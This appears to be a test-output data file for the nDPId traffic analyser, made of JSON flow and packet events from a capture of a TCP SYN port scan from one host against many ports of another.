-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsd34AAC0Go\/SsEAAIQA2GNIzSBTDdUoMYAAAAAGACCAArXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoIAAADgGb\/KsEAAIQA2GNIzSBI7dUoMYAAAAAGACBAAwAQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIwAACsGDOesEAAIQA2GNIzSD6XdUoMYAAAAAGACEAAY6gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsTAEAADYGxnGsEAAIQA2GNIzSFqjdUoMYAAAAAGACDAAV5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnkwAAC0GfSasEAAIQA2GNIzSBBDdUoMYAAAAAGACCAAsfwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFfcAACcGC3ysEAAIQA2GNIzSAGPdUoMYAAAAAGACEAAoLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqoAACYG18isEAAIQA2GNIzSFUDdUoMYAAAAAGACDAAXTwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsviQAACgGYk6sEAAIQA2GNIzSatzdUoMYAAAAAGACBADJsgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsLroAACwG7bisEAAIQA2GNIzSEA\/dUoMYAAAAAGACBAAkgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsCv8AAC4GD3SsEAAIQA2GNIzSTUTdUoMYAAAAAGACDADfSgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/JoAACYGJdisEAAIQA2GNIzSHnjdUoMYAAAAAGACDAAOFwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnFAAAC4GfiKsEAAIQA2GNIzSBD\/dUoMYAAAAAGACDAAoUAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+0AADUGL4WsEAAIQA2GNIzSBoLdUoMYAAAAAGACCAAqDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsav8AADsGonOsEAAIQA2GNIzTDuHdU4MZAAAAAGACEAAZqwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/dIAACcGI6CsEAAIQA2GNIzTDvPdU4MZAAAAAGACEAAZmQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs8f8AACcGL3OsEAAIQA2GNIzTFf\/dU4MZAAAAAGACEAASjQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsf98AADQGlJOsEAAIQA2GNIzTB9HdU4MZAAAAAGACBAAsuwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs4wcAACgGPWusEAAIQA2GNIzTPoHdU4MZAAAAAGACBAD2CgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsxOgAACoGWYqsEAAIQA2GNIzTECHdU4MZAAAAAGACDAAcawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsfUMAAC0Gni+sEAAIQA2GNIzTCvvdU4MZAAAAAGACCAAlkQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsdR4AACkGqlSsEAAIQA2GNIzTDZTdU4MZAAAAAGACCAAi+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAs2GAAACkGRxKsEAAIQA2GNIzTB\/7dU4MZAAAAAGACCAAojgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAse2wAADEGnAasEAAIQA2GNIzTCdrdU4MZAAAAAGACCAAmsgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsoZYAADAGdtysEAAIQA2GNIzTBCTdU4MZAAAAAGACBAAwaAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsB5YAACkGF92sEAAIQA2GNIzTBBfdU4MZAAAAAGACCAAsdQAAAgQFtA=="} 